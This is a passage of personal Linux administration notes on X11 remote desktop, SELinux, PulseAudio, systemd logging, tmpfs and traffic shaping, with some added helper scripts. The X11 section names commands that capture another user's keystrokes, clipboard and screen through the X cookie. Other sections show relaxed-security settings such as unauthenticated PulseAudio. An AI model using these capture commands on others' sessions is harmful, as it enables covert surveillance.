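redact_sample
```

Used as ``cat /proc/cpuinfo /proc/cmdline | redact_identifiers`` (or on a saved ``dmesg`` file), it produces exactly the form of the outputs above; kernel pointers and ASLR addresses are handled separately by ``kptr_restrict`` and the manual ``X`` replacement described in the list.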


Playing videos
--------------

In order to play videos at a decent framerate (using the hardware acceleration
provided by the GPU), a custom version of ``mpv`` and some other software need
to be installed. Instructions are available at
https://www.raspberrypi.org/forums/viewtopic.php?t=199775
--------------------------------------------------------------------------------
/sysadmin/remote-desktop-linux.rst:
--------------------------------------------------------------------------------
Remote Desktop on Linux
=======================

Most Linux-based systems use X11 or Wayland in order to render the desktop.
In order to connect to a remote Linux system and operate it with a graphical user interface, there exist several approaches: VNC, RDP, X11 forwarding over SSH, etc.

X11 principles
--------------

X11 is a specification and a protocol for the *X Window System*, which provides a graphical user interface.
It relies on a client/server pattern where:

* The server is the program that drives the physical peripherals (display, mouse, keyboard, etc.) and therefore runs on the machine they are attached to.
* Each application is a client of the server.

Among applications, some special ones render the window borders, the desktop background, etc.
These are parts of a desktop environment.

On a local system, the X11 server listens on a Unix socket located at ``/tmp/.X11-unix/X0``.
This is referred to by client applications as ``:0.0``.
A client knows which server it talks to through the ``$DISPLAY`` environment variable:

.. code-block:: sh

    $ echo $DISPLAY
    :0.0

This variable may also contain an IP address, for remote X11.
For example ``DISPLAY=192.168.1.2:0`` refers to a server running at 192.168.1.2 on TCP port 6000.
The general form of the variable ``DISPLAY`` is ``hostname:D.S`` where ``hostname`` is the name of the target host (empty for a local server), ``D`` is the display index and ``S`` is the screen index.
On a remote host, the associated TCP port is computed as ``6000 + D``.
On the local host, the display index gives the path of the Unix socket: ``"/tmp/.X11-unix/X" + D``.

The X11 server authenticates clients with a magic cookie stored in ``$HOME/.Xauthority``: any process that can read this file can connect to the display with the full rights listed below.
The content of this binary file can be decoded using ``xauth list``::

    $ xauth list
    myhost/unix:0  MIT-MAGIC-COOKIE-1  7a77125b6af11c25a72662e316ab40a0

The X11 protocol allows many powerful actions for clients, such as:

* changing the screen resolution (``xrandr`` command)
* getting information about any window (``xwininfo`` command, such as ``xwininfo -root -tree``)
* getting the PID (process identifier) which owns a window (``xprop _NET_WM_PID``)
* reading all keystrokes (``xinput`` command, such as ``xinput test $KEYBOARD_NUM``)
* reading and writing the clipboard buffers (``xsel`` command)
* taking a screenshot (``import -display :0 -window root screenshot.png`` from ImageMagick)
* etc.

In the core protocol there is no isolation between the clients of a display: every connected client may do all of this to every other client's windows and input.


Remote X11
----------

On a trusted network, it is possible to expose a X11 server on a TCP port.
As the communication is not encrypted, this setup is not recommended as-is.
It is nonetheless possible to encapsulate the X11 protocol in a secure tunnel (that provides confidentiality, integrity and authentication), such as a VPN.
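The ``DISPLAY`` rules above (``hostname:D.S``, Unix socket ``/tmp/.X11-unix/X`` + D, TCP port 6000 + D) as a resolver, plus a check of whether the local X server is reachable over TCP at all; added here as an example, not code from the original page. The resolver is pure shell; the host check assumes ``ss`` from iproute2 is installed and is only informative.

```shell
#!/bin/sh
# Added example: resolve a DISPLAY value to the endpoint an X11 client
# would open, following the hostname:D.S convention described above.
# Prints "unix <socket path> <screen>" or "tcp <host> <port> <screen>".
# (Bracketed IPv6 hosts such as "[::1]:0" are not handled.)
x11_display_endpoint() {
    display="$1"
    case "$display" in
        *:*) ;;
        *) echo "malformed DISPLAY: $display" >&2; return 1 ;;
    esac
    host="${display%%:*}"        # empty for a local server
    rest="${display#*:}"         # "D" or "D.S"
    disp="${rest%%.*}"
    case "$rest" in
        *.*) screen="${rest#*.}" ;;
        *)   screen=0 ;;
    esac
    case "$disp" in
        ''|*[!0-9]*) echo "malformed display number in: $display" >&2; return 1 ;;
    esac
    # "unix:D" is the conventional spelling for the local socket (cf. xauth list)
    if [ -z "$host" ] || [ "$host" = "unix" ]; then
        printf 'unix /tmp/.X11-unix/X%s %s\n' "$disp" "$screen"
    else
        printf 'tcp %s %s %s\n' "$host" "$((6000 + disp))" "$screen"
    fi
}

# Is a local X server listening on TCP for display D (default 0)?
# Modern distributions start X with -nolisten tcp; a listener on 6000+D
# means any host that can reach the port may try to attach (cookie permitting).
x11_tcp_listener() {
    port=$((6000 + ${1:-0}))
    ss -ltn 2>/dev/null | awk -v p=":$port" '$4 ~ p"$" { found = 1 } END { exit !found }'
}

for d in :0.0 unix:1 192.168.1.2:0 localhost:10.0; do
    printf '%-16s -> %s\n' "$d" "$(x11_display_endpoint "$d")"
done
if x11_tcp_listener 0; then
    echo "display :0 is reachable over TCP (port 6000)"
else
    echo "display :0 is not listening on TCP"
fi
```

``localhost:10.0`` is what OpenSSH sets on the remote side when forwarding X11: the resolver turns it into TCP port 6010 on the loopback interface, which is the SSH-managed listener rather than a real X server.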
OpenSSH also provides an easy way to forward a X11 server over a SSH connection, so that remote applications can run on the local X11 server.
This feature is called *X11 forwarding* and is enabled using a configuration variable (``X11Forwarding yes`` on the SSH server, ``ForwardX11 yes`` on the SSH client) or a command-line switch (``-X`` or ``-Y``).
As X11 clients are powerful, OpenSSH allows specifying whether the remote server is to be fully trusted (``ForwardX11Trusted`` configuration variable, ``-Y`` option) or not (``-X`` option).
With ``-X``, the forwarded clients get a cookie restricted by the X SECURITY extension, which keeps them from reading other windows or keystrokes; ``-Y`` removes that restriction, so it should only be used with a remote host trusted as much as the local session.


Remote Desktop
--------------

Sometimes, there is a need to connect to a remote host that is running a X11 server with applications.
Several VNC and RDP servers create a new X11 server for each remote connection, which isolates users from one another.

For example Microsoft documents how to set up xrdp on https://docs.microsoft.com/en-us/azure/virtual-machines/linux/use-remote-desktop:

.. code-block:: sh

    echo xfce4-session >~/.xsession
    sudo service xrdp restart

It is also possible to expose the X11 server as a VNC server using ``x11vnc``, as described in https://undeadly.org/cgi?action=article;sid=20071108214134:

.. code-block:: sh

    # Connect using SSH to the remote host, forwarding the VNC port
    # Several websites state that allocating a PTY (-t) for x11vnc makes it faster
    ssh -t -L 5900:localhost:5900 remotehost

    # Start x11vnc on the remote host to expose the first display as a VNC server
    # -localhost: only accept VNC connections from the remote host itself, i.e. through the SSH tunnel
    # The user display can also be found using "-find"
    x11vnc -display :0 -auth "$HOME/.Xauthority" -localhost

    # Connect from the local host to the VNC server, reachable through localhost:5900
    vncviewer -depth 8 -encodings hextile localhost:0

If the remote host does not have an X11 server, it is possible to start a virtual one such as Xvfb:

.. code-block:: sh

    # On the remote host
    export DISPLAY=:1
    Xvfb :1 -screen 0 1024x768x16 &
    # -nopw: no VNC password; acceptable only because -localhost limits access to the SSH tunnel
    x11vnc -display :1 -nopw -localhost -xkb

This can be used to run software such as QEMU with a graphical output, or a web browser, etc.
--------------------------------------------------------------------------------
/sysadmin/selinux.rst:
--------------------------------------------------------------------------------
Some notes about my SELinux installation
========================================

This document does not cover how to install SELinux. If you want to install
it, please read one of these websites:

* https://wiki.debian.org/SELinux
* https://wiki.gentoo.org/wiki/SELinux/Tutorials (an excellent tutorial for Gentoo)
* https://fedoraproject.org/wiki/SELinux
* https://wiki.archlinux.org/index.php/SELinux

To develop the SELinux policy, here are the relevant git repositories:

* https://github.com/SELinuxProject/refpolicy (Reference Policy)
* https://gitweb.gentoo.org/proj/hardened-refpolicy.git/ (Gentoo)
* https://github.com/selinux-policy/selinux-policy/tree/rawhide (Fedora)
* https://salsa.debian.org/selinux-team/refpolicy/tree/debian (Debian)

And here is some documentation related to writing the policy:

* http://oss.tresys.com/docs/refpolicy/api/ (reference policy API)
* http://www.selinuxproject.org/page/ObjectClassesPerms
  (SELinux Object Classes and Permissions Reference)
* https://wiki.gentoo.org/wiki/Project:SELinux/Development (Gentoo doc)
* http://wiki.gentoo.org/wiki/Project:SELinux/CodingStyle
  (Gentoo coding style for SELinux)

And while listing websites, here are some more:

* https://people.redhat.com/sgrubb/audit/visualize/index.html
  (Audit Data Visualization)
* https://github.com/SELinuxProject/selinux
  (SELinux userland libraries and tools repository)
* http://www.freetechbooks.com/the-selinux-notebook-the-foundations-t785.html
  (The SELinux Notebook - The Foundations)
* https://lore.kernel.org/selinux/
  SELinux Mailing List Archive on lore.kernel.org
* https://lore.kernel.org/selinux-refpolicy/
  SELinux-Refpolicy Mailing List Archive on lore.kernel.org

The present document will focus on some pitfalls I've encountered since
installing SELinux on systems running Debian or ArchLinux.


Install a strict policy
-----------------------

On Debian, a targeted policy is installed by default: daemons are confined but
users are not. To confine users, you need to remove the unconfined module.
To do this:

.. code-block:: sh

    # Set up staff accounts
    semanage login -a -s staff_u userlogin

    # Confine other users
    semanage login -m -s user_u -r s0 __default__

    # Map root to root instead of unconfined_u
    semanage login -m -s root root

    # Remove the unconfined module
    semodule -r unconfined

The order matters: the login mappings are changed first, because once the
``unconfined`` module is removed, ``unconfined_u`` no longer exists and a login
still mapped to it cannot get a valid context.


Use ``run_init`` as root without a password
-------------------------------------------

The ``run_init`` command (to manage services) authenticates the real user with PAM
before making a transition to the ``system_u:system_r:init_t`` context. The default
configuration tells PAM to ask for a password, but this may be
annoying on non-critical systems where root needs to restart services.
To disable the password prompt for root, add this at the beginning of
``/etc/pam.d/run_init``::

    auth sufficient pam_rootok.so

Moreover, make sure that you allow ``run_init_t`` to use ``pam_rootok.so``::

    allow run_init_t self:passwd rootok;


Fix ``/tmp`` labeling
---------------------

If ``mount`` shows::

    tmpfs on /tmp type tmpfs (rw,nosuid,nodev,relatime,rootcontext=system_u:object_r:file_t:s0,seclabel)

... or if ``ls -Zd /tmp`` shows::

    system_u:object_r:file_t:SystemLow /tmp

... ``/tmp`` is incorrectly labeled ``file_t`` instead of ``tmp_t``.
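The diagnosis above as a check, added here as an example and not from the original page: it extracts the type from a security context (with or without the MLS ``:s0`` or ``SystemLow`` suffix), taking it either from the ``rootcontext=`` option of a ``mount`` line or from an ``ls -Zd`` line, and tells apart the three cases ``tmp_t`` (fine), ``file_t`` (unlabeled) and ``tmpfs_t`` (fstab needs ``rootcontext``). The ``mount`` and ``ls`` lines it runs on are constructed from the symptoms quoted above, not live output.

```shell
#!/bin/sh
# Added example: detect a mislabeled /tmp from "mount" or "ls -Zd" output.

# selinux_type CONTEXT -> the type field of user:role:type[:mls]
selinux_type() {
    ctx="$1"
    ctx="${ctx#*:}"              # drop the SELinux user
    ctx="${ctx#*:}"              # drop the role
    printf '%s\n' "${ctx%%:*}"   # type; MLS/MCS part (s0, SystemLow...) dropped
}

# tmp_context_from_mount_line LINE -> context given by the rootcontext= option
tmp_context_from_mount_line() {
    printf '%s\n' "$1" | sed -n 's/.*[(,]rootcontext=\([^,)]*\).*/\1/p'
}

# tmp_context_from_ls_line LINE -> the context column of "ls -Zd" output
# (the first field containing at least two ':' characters)
tmp_context_from_ls_line() {
    for f in $1; do
        case "$f" in *:*:*) printf '%s\n' "$f"; return 0 ;; esac
    done
    return 1
}

# tmp_label_ok CONTEXT -> 0 when the type is tmp_t, 1 otherwise
tmp_label_ok() {
    [ "$(selinux_type "$1")" = "tmp_t" ]
}

# check_tmp_label CONTEXT: verdict for humans, exit status for scripts
check_tmp_label() {
    t=$(selinux_type "$1")
    case "$t" in
        tmp_t)   echo "/tmp is labeled tmp_t: OK"; return 0 ;;
        file_t)  echo "/tmp is labeled file_t: unlabeled, relabel it with setfiles"; return 1 ;;
        tmpfs_t) echo "/tmp is labeled tmpfs_t: add rootcontext=...:tmp_t... to /etc/fstab"; return 1 ;;
        *)       echo "/tmp has unexpected type $t"; return 1 ;;
    esac
}

# Constructed lines reproducing the symptoms described above (not live output)
MOUNT_LINE='tmpfs on /tmp type tmpfs (rw,nosuid,nodev,relatime,rootcontext=system_u:object_r:file_t:s0,seclabel)'
LS_LINE='system_u:object_r:file_t:SystemLow /tmp'
GOOD_LINE='system_u:object_r:tmp_t:s0 /tmp'

for ctx in "$(tmp_context_from_mount_line "$MOUNT_LINE")" \
           "$(tmp_context_from_ls_line "$LS_LINE")" \
           "$(tmp_context_from_ls_line "$GOOD_LINE")"; do
    check_tmp_label "$ctx" || :
done
```

On a live system the same functions take ``mount | grep ' /tmp '`` and ``ls -Zd /tmp`` as input; ``tmp_label_ok`` is the one to call from a boot-time or configuration-management check.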

To fix the label, you need to restore the context of the ``/tmp`` directory of the
root filesystem (hidden under the tmpfs mount) to ``system_u:object_r:tmp_t:s0``::

    mount --bind / /mnt
    setfiles -r /mnt /etc/selinux/default/contexts/files/file_contexts /mnt
    umount /mnt

(``setfiles`` walks everything under ``/mnt`` here; passing ``/mnt/tmp`` as the
last argument limits the relabeling to ``/tmp``.)

It is also possible to use such a line in ``/etc/fstab`` (without the ``:s0`` suffix
when using a policy without MLS)::

    tmpfs /tmp tmpfs nodev,nosuid,rootcontext=system_u:object_r:tmp_t:s0 0 0

If ``ls -Zd /tmp`` shows type ``tmpfs_t`` instead of ``tmp_t``, it is also
needed to modify ``/etc/fstab`` accordingly.


Configure SELinux booleans
--------------------------

Here are some booleans I use on almost all my SELinux systems (enabled with ``setsebool -P $BOOL on`` or ``semanage boolean -m --on $BOOL``):

.. code-block:: sh

    # Allow users to send ping
    setsebool -P user_ping on

    # Enable reading of urandom for all domains
    setsebool -P global_ssp on

    # Use CGI with nginx (eg. for gitweb)
    setsebool -P httpd_enable_cgi on
    setsebool -P nginx_enable_http_server on

    # Make GPG agent work
    setsebool -P gpg_agent_env_file on

    # Allow memory mappings that are both writable and executable (disables W^X
    # enforcement) for the applications that need it (eg. Firefox's JIT)
    setsebool -P allow_execmem on

    # Allow privileged users (sysadm_u, unconfined_u, etc.) to log in through SSH
    setsebool -P ssh_sysadm_login on

    # Allow privileged users (sysadm_u, unconfined_u, etc.) to log in through X
    setsebool -P xdm_sysadm_login on


Fix labels for files in ``/home``
---------------------------------

By default, files under ``/home`` are labeled as user home directories. On some
systems, ``/home`` is on the largest disk partition and hosts other things,
like database files (instead of ``/var/lib/...`` folders) or Git repositories.
For such folders, use a command like this to specify the real file context
to use::

    semanage fcontext -a -t httpd_sys_content_t "/home/git(/.*)?"

This only records the rule; apply it to the existing files with
``restorecon -R /home/git``.


Generate interface file for ``audit2allow -R``
----------------------------------------------

``audit2allow -R`` needs ``/var/lib/sepolgen/interface_info``, which is created
by ``sepolgen-ifgen``. However, as the ``-p`` parameter of this command is
buggy, your interface files need to be located in the ``default`` policy, i.e.
in the ``/usr/share/selinux/default/include`` directory. For example, add a symlink
``/usr/share/selinux/default`` to your policy directory:

.. code-block:: sh

    . /etc/selinux/config
    cd /usr/share/selinux && ln -s $SELINUXTYPE default
    sepolgen-ifgen


Activate some SELinux modules
-----------------------------

To reload modules, go to ``/usr/share/selinux/$(policyname)`` and run::

    semodule --verbose -b base.pp -s $(basename $(pwd)) -n -i module1.pp -i ...


Allow ``staff_u`` to read ``/root`` when running ``sudo``
---------------------------------------------------------

By default ``/etc/selinux/default/modules/active/file_contexts.homedirs``
defines ``/root`` to be labeled ``root:object_r:user_home_t``, which ``staff_u``
can't access (there is a constraint for it).
To solve this issue, change the
constraint or (much simpler) change the SELinux user associated with ``/root``::

    chcon -u staff_u /root -R

Alternatively it is possible to consider root as a usual staff user::

    semanage login -m -s staff_u root


Export local configuration done with ``semanage``
-------------------------------------------------

To export all local changes done with ``semanage``, there is an option::

    semanage -o

To import exported data back to the local configuration::

    semanage -i

(Newer versions of ``semanage`` provide the same through ``semanage export -f FILE``
and ``semanage import -f FILE``.)


Bugs still present in October 2014
----------------------------------

In ArchLinux, ``/sys`` is not labelled correctly on boot. It needs to be labeled
by systemd using a ``tmpfiles.d`` configuration. Therefore you need to add this in
``/etc/tmpfiles.d/sysfs.conf``::

    Z /sys/devices/system/cpu/online 0444 root root

For further information, please read:

* https://bugzilla.redhat.com/show_bug.cgi?id=767355
* http://www.spinics.net/lists/selinux/msg11684.html
--------------------------------------------------------------------------------
/sysadmin/sound.rst:
--------------------------------------------------------------------------------
Sound Configuration
===================

Here are some notes about how I set up sound on my desktop systems.


MPD and PulseAudio
------------------

MPD (Music Player Daemon) is a system daemon which plays music from files,
playlists... It needs to interact with PulseAudio to get the sound out (using
ALSA) to enable multiplexing several audio output streams (like the ones which
are played by the Desktop Environment to signal important events to the user).

As it is discouraged to run PulseAudio as a system daemon, I use the standard
setup which spawns one PulseAudio server per logged-in user.
However, to allow
multiplexing, MPD needs to use the same server as my user. Hence on my system
MPD is running with my user ID.

ArchLinux's MPD wiki article gives some tips to set up such a configuration.
First, configure these two files:

``/etc/systemd/system/mpd-MYUSER.service``::

    .include /usr/lib/systemd/system/mpd.service

    [Unit]
    Description=Music Player Daemon (running as MYUSER)

    [Service]
    User=MYUSER
    PAMName=system-local-login

(``.include`` is deprecated in recent systemd versions; a drop-in file under
``/etc/systemd/system/mpd.service.d/`` is the current way to override ``User=``.)

``/etc/mpd.conf``::

    music_directory         "/home/public/music"
    playlist_directory      "/var/lib/mpd/playlists"
    db_file                 "/var/lib/mpd/mpd.db"
    pid_file                "/var/lib/mpd/mpd.pid"
    state_file              "/var/lib/mpd/mpdstate"

    user                    "MYUSER"
    audio_output {
        type    "pulse"
        name    "MPD Pulse Output"
    }

Then disable the system-wide MPD service and enable the new one:

.. code-block:: sh

    systemctl disable mpd
    systemctl stop mpd
    systemctl start mpd-MYUSER
    systemctl enable mpd-MYUSER

Documentation:
https://wiki.archlinux.org/index.php/MPD/Tips_and_Tricks#MPD_and_PulseAudio
(This wiki also describes the setup with a local TCP socket)


Network
-------

Streaming audio over the network is quite easy with PulseAudio. Let's
suppose host ``192.0.2.42`` wants to send its audio output to a PulseAudio
server running on host ``192.0.2.1``.

First set up the listener (``192.0.2.1``) to accept connections from the sender
(``192.0.2.42``). ``/etc/pulse/default.pa``::

    load-module module-native-protocol-tcp auth-ip-acl=127.0.0.1;192.0.2.42

Or here is the insecure configuration, which lets any host that can reach the
port play audio and control the server without authentication::

    load-module module-native-protocol-tcp listen=0.0.0.0 auth-anonymous=1

Then configure the sender to send its audio output.
``/etc/pulse/default.pa``::

    load-module module-rtp-send destination=192.0.2.1 port=16001

To sync the configuration of PulseAudio with X11, it may be necessary to run::

    pax11publish -e
--------------------------------------------------------------------------------
/sysadmin/systemd.rst:
--------------------------------------------------------------------------------
systemd configuration
=====================

Even if systemd works well with the default configuration, it needs to be
configured on some systems so that logs don't fill the disk, etc.

Logging: syslog and journald
----------------------------

On most of my systems I'm using syslog-ng to manage my log files. This
interfaces quite well with journald, as the only thing you need to do to make it
work is to use these sources in ``/etc/syslog-ng/syslog-ng.conf``::

    source src {
        unix-dgram("/run/systemd/journal/syslog");
        internal();
        file("/proc/kmsg");
    };

Once this is done, you no longer need persistent storage in ``/var/log/journal``.
Instead of deleting this directory or making it a tmpfs, the right way to
disable persistent storage is to set this in ``/etc/systemd/journald.conf``::

    Storage=volatile
    ForwardToSyslog=yes
    ForwardToKMsg=no
    ForwardToConsole=no

More information can be found in the man page:
http://www.freedesktop.org/software/systemd/man/journald.conf.html

If you use persistent storage, you may want to rotate logs every 3 months for
example. This option in ``/etc/systemd/journald.conf`` tells journald to do
this::

    MaxRetentionSec=3month

Logging: audit logs and journald
--------------------------------

journald can listen to the audit socket for events.
Even if that could be
useful without the ``auditd`` service, it can spam the logs when using software
such as Chrome (https://bugs.chromium.org/p/chromium/issues/detail?id=456535
has been open for more than a year) and it does not honour auditctl
configuration such as::

    auditctl -a never,exit -F arch=b64 -S set_robust_list -F path=/usr/lib/chromium/chromium -F key=bug456535

(This line without ``auditctl`` can be put in
``/etc/audit/rules.d/chromium.rules`` so that ``augenrules --load`` loads it
at every boot.)

To disable this journald feature, the easiest way consists in masking the audit
socket (cf. https://github.com/systemd/systemd/issues/959#issuecomment-174541674):

.. code-block:: sh

    systemctl mask systemd-journald-audit.socket

Write journal on tty
--------------------

On a workstation, it can be quite convenient to read the journal directly on
ttys above 7 (tty1-6 being consoles and tty7 the X Window session, for example).

With syslog-ng, the configuration is quite straightforward::

    source src { system(); };
    destination d_tty9 { file("/dev/tty9" owner(-1) group(-1) perm(-1)); };
    destination d_tty10 { file("/dev/tty10" owner(-1) group(-1) perm(-1)); };
    destination d_tty11 { file("/dev/tty11" owner(-1) group(-1) perm(-1)); };
    destination console_all { file("/dev/tty12" owner(-1) group(-1) perm(-1)); };
    filter f_authpriv { facility(auth, authpriv); };
    filter f_daemon { facility(daemon); };
    filter f_kernel { facility(kern); };
    log { source(src); filter(f_authpriv); destination(d_tty9); };
    log { source(src); filter(f_daemon); destination(d_tty10); };
    log { source(src); filter(f_kernel); destination(d_tty11); };
    log { source(src); destination(console_all); };

It is also possible to send emergency messages to everyone logged in::

    source s_src {
        system();
        internal();
    };
    destination du_all { usertty("*"); };
    filter f_emerg { level(emerg); };
    log { source(s_src); filter(f_emerg); destination(du_all); };

With journald, the only "natively" available feature is logging to a tty, with
something like this in ``/etc/systemd/journald.conf``::

    ForwardToConsole=yes
    TTYPath=/dev/tty12
    MaxLevelConsole=info

The other filters can be implemented with services. Here are some files.

``/etc/systemd/system/journal@.service``::

    [Unit]
    Description=Show journal on %I
    After=systemd-journald.service
    ConditionPathExists=/dev/%I

    [Service]
    Type=idle
    StandardOutput=tty
    TTYPath=/dev/%I
    TTYReset=yes
    TTYVHangup=yes

    [Install]
    WantedBy=multi-user.target

``/etc/systemd/system/journal@tty9.service``::

    .include /etc/systemd/system/journal@.service

    [Unit]
    Description=Show journal on %I (auth)

    [Service]
    # Facilities: 4 = LOG_AUTH, 10 = LOG_AUTHPRIV
    ExecStart=/usr/bin/journalctl -b -n50 SYSLOG_FACILITY=4 SYSLOG_FACILITY=10

``/etc/systemd/system/journal@tty10.service``::

    .include /etc/systemd/system/journal@.service

    [Unit]
    Description=Show journal on %I (daemon)

    [Service]
    # Facility codes:
    # 2 = LOG_MAIL
    # 3 = LOG_DAEMON
    # 5 = LOG_SYSLOG
    # 6 = LOG_LPR
    # 7 = LOG_NEWS
    # 8 = LOG_UUCP
    # 9 = LOG_CRON
    # 11 = LOG_FTP
    #
    # Not selected:
    # 0 = LOG_KERN
    # 1 = LOG_USER
    # 4 = LOG_AUTH
    # 10 = LOG_AUTHPRIV
    # 16..23 = LOG_LOCAL0..7
    #
    # Source: /usr/include/sys/syslog.h
    # in glibc: https://sourceware.org/git/?p=glibc.git;a=blob;f=misc/sys/syslog.h;hb=HEAD
    ExecStart=/usr/bin/journalctl -b -n50 \
        SYSLOG_FACILITY=2 SYSLOG_FACILITY=3 SYSLOG_FACILITY=5 SYSLOG_FACILITY=6 \
        SYSLOG_FACILITY=7 SYSLOG_FACILITY=8 SYSLOG_FACILITY=9 SYSLOG_FACILITY=11

``/etc/systemd/system/journal@tty11.service``::

    .include /etc/systemd/system/journal@.service

    [Unit]
    Description=Show journal on %I (kernel)

    [Service]
    # --dmesg implies -b and _TRANSPORT=kernel
    ExecStart=/usr/bin/journalctl -b -f -n 50 --dmesg

``/etc/systemd/system/journal@tty12.service``::

    .include /etc/systemd/system/journal@.service

    [Unit]
    Description=Show journal on %I (everything)

    [Service]
    ExecStart=/usr/bin/journalctl -b -f -n 50

With such commands, it is also possible to pipe ``journalctl`` output to
``ccze`` (if installed) to colorize the logs.


Configure timers (and remove cron)
----------------------------------

systemd doesn't rely on a cron daemon to run periodic tasks but uses its own
system with calendar time events. ArchLinux provides on its wiki some config
files to replace common cron scripts:
https://wiki.archlinux.org/index.php/Systemd/cron_functionality

Since April 2014 the timers are included and enabled by default, with timer
files in ``/usr/lib/systemd/system`` and symlinks in
``/usr/lib/systemd/system/multi-user.target.wants/``. To disable some timers
which do many disk writes, an overriding unit needs to be created.

``/etc/systemd/system/disabled-timer.service``::

    [Unit]
    Description=Unit to be able to disable timers

    [Service]
    Type=oneshot
    ExecStart=/usr/bin/true


``/etc/systemd/system/updatedb.timer``::

    [Unit]
    Description=Disabled locate database update

    [Timer]
    #OnCalendar=daily
    #Persistent=true
    #OnBootSec=10min
    #OnUnitActiveSec=1d
    OnCalendar=monthly
    Unit=disabled-timer.service

Another way may consist in masking the service units, but it did not work well
back in spring 2014::

    $ systemctl mask updatedb
    Created symlink from /etc/systemd/system/updatedb.service to /dev/null.

Automatically create a bridge interface
---------------------------------------

To automatically create a bridge interface, which can be used for example to
bridge together several virtual machines, here is a systemd-networkd
configuration.

``/etc/systemd/network/VMBridge.netdev``::

    [NetDev]
    Name=br0
    Kind=bridge

``/etc/systemd/network/br0.network``::

    [Match]
    Name=br0

    [Network]
    IPForward=yes

    [Address]
    Address=198.51.100.0/24
--------------------------------------------------------------------------------
/sysadmin/tmpfs.rst:
--------------------------------------------------------------------------------
Use tmpfs for some directories
==============================

On my hosts I configure some directories to be tmpfs mountpoints to save disk
writes, which is very important when using SSD drives. Here is how to do so.

``/tmp``
--------

Here is what I usually put in my ``/etc/fstab``::

    #
    tmpfs /tmp tmpfs nodev,nosuid,noexec 0 0

``$HOME/.cache``
----------------

Example of an ``/etc/fstab`` entry for a user's ``.cache`` home subdirectory::

    $USER.cache $HOME/.cache tmpfs defaults,auto,nodev,noexec,nosuid,size=2048M,gid=100,uid=1000,mode=0700 0 0

As ``.cache/pacaur`` is intended to persist across reboots, this directory can
be set up as a bind-mount::

    $HOME/.cache.pacaur $HOME/.cache/pacaur none bind 0 0

Yaourt build dir on ArchLinux
-----------------------------

To build AUR packages, yaourt uses ``/tmp/yaourt-tmp-$USER``.
To make this
directory a tmpfs mountpoint for the duration of a build, add the following line to
``/etc/fstab``::

    $USER.yaourt /tmp/yaourt-tmp-$USER tmpfs defaults,user,noauto,nodev,exec,nosuid,gid=$GID,uid=$UID,mode=0700 0 0

Then, create (if needed) and mount ``/tmp/yaourt-tmp-$USER`` before running
yaourt.

Other directories
-----------------

Here are some entries which may be written into ``/etc/fstab``::

    # Web browser downloads
    $HOME/Downloads/tmp tmpfs defaults,auto,nodev,nosuid,exec,gid=$GID,uid=$UID,mode=0700,rootcontext=$(getfattr --only-values -n security.selinux $HOME/Downloads) 0 0

    # makepkg build directory (modify BUILDDIR=/tmp/makepkg-$USER in /etc/makepkg.conf)
    $USER.yaourt /tmp/makepkg-$USER tmpfs defaults,user,noauto,nodev,exec,nosuid,gid=$GID,uid=$UID,mode=0700 0 0
--------------------------------------------------------------------------------
/sysadmin/traffic-shaping.rst:
--------------------------------------------------------------------------------
Traffic shaping
===============

This is not a complete guide explaining how to shape traffic but a list
of not-so-intuitive commands related to traffic shaping.

Documentation:

* http://linux-ip.net/articles/Traffic-Control-HOWTO/
* http://lartc.org/wondershaper/ (scripts to do QoS on ADSL)
* https://www.kernel.org/doc/Documentation/cgroups/net_cls.txt (filter with cgroup)
* http://lartc.org/manpages/tc.html (official manpage)
* http://lartc.org/howto/lartc.qdisc.filters.html (tc filters)

First, to dump the current traffic shaping rules on interface ``eth0``, use the
following command (``tc`` means "Traffic Controller")::

    tc -s qdisc show dev eth0

By default it will display something like::

    qdisc pfifo_fast 0: root refcnt 2 bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1
     Sent 42000 bytes 1337 pkt (dropped 0, overlimits 0 requeues 0)
     backlog 0b 0p requeues 0

At any time, to restore this default configuration (and remove all rules), run::

    tc qdisc del dev eth0 root


Egress shaping (limiting outbound traffic)
------------------------------------------

This command attaches a TBF (Token Bucket Filter) to ``eth0`` which:

* limits the maximum rate to 1 Mbit/s,
* defines a peak rate of 2 Mbit/s,
* uses a 10 KB buffer,
* limits the latency caused by the TBF to at most 70 ms.

::

    tc qdisc add dev eth0 root tbf rate 1mbit peakrate 2mbit burst 10kb latency 70ms minburst 1540


Delay
-----

This command applies a delay of 500 ms to each outbound packet::

    tc qdisc add dev eth0 root netem delay 500ms

With this, ``tc qdisc show dev eth0`` shows::

    qdisc netem 8001: root refcnt 2 limit 1000 delay 500.0ms


HTTP server outbound traffic shaping
------------------------------------

When running an HTTP server on TCP port 80, it is possible to throttle the
outbound traffic with ``tc-htb`` (Hierarchy Token Bucket)::

    tc qdisc add dev eth0 root handle 1:0 htb default 1
    tc class add dev eth0 parent 1:0 classid 1:10 htb rate 512kbps ceil 768kbps prio 0
    tc filter add dev eth0 parent 1:0 protocol ip u32 match ip sport 80 0xffff flowid 1:10

Here are some commands to get a behavior similar to that of the last ``tc filter``
command, using ``iptables`` marks::

    iptables -A OUTPUT -t mangle -o eth0 -p tcp --sport 80 -j MARK --set-mark 10
    ip6tables -A OUTPUT -t mangle -o eth0 -p tcp --sport 80 -j MARK --set-mark 10
    tc filter add dev eth0 parent 1:0 prio 0 protocol ip handle 10 fw flowid 1:10


To show active rules::

    # tc -s -d class show dev eth0
    class htb 1:10 root prio 0 quantum 51200 rate 4096Kbit ceil 6144Kbit burst 1599b/1 mpu 0b overhead 0b cburst 1598b/1 mpu 0b overhead 0b level 0
     Sent 42000 bytes 1337 pkt (dropped 0, overlimits 0 requeues 0)
     rate 400bit 0pps backlog 0b 0p requeues 0
     lended: 1337 borrowed: 0 giants: 0
     tokens: 44738 ctokens: 29819

    # tc filter show dev eth0
    filter parent 1: protocol ip pref 49152 fw

It is also possible to filter by IP address::

    tc filter add dev eth0 parent 1:0 protocol ip prio 1 u32 match ip dst 192.0.2.42/32 flowid 1:1
    tc filter add dev eth0 parent 1:0 protocol ipv6 prio 2 u32 match ip6 dst 2001:db8::beef/128 flowid 1:1
    tc filter add dev eth0 parent 1:0 protocol ip prio 3 u32 match ip src 192.0.2.36/32 flowid 1:2
    tc filter add dev eth0 parent 1:0 protocol ipv6 prio 4 u32 match ip6 src 2001:db8::cafe/128 flowid 1:2

If you happen to define filters for IPv4 and IPv6 with the same priority, the
kernel rejects the request with a mysterious message::

    RTNETLINK answers: Invalid argument
    We have an error talking to the kernel

When such a thing happens, you only need to use a different "prio" argument for
your IPv4 and IPv6 filters.
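
As an added example (not part of the original page), here is a small Python parser
for the ``tc -s qdisc show`` and ``tc -s class show`` statistics shown above: it turns
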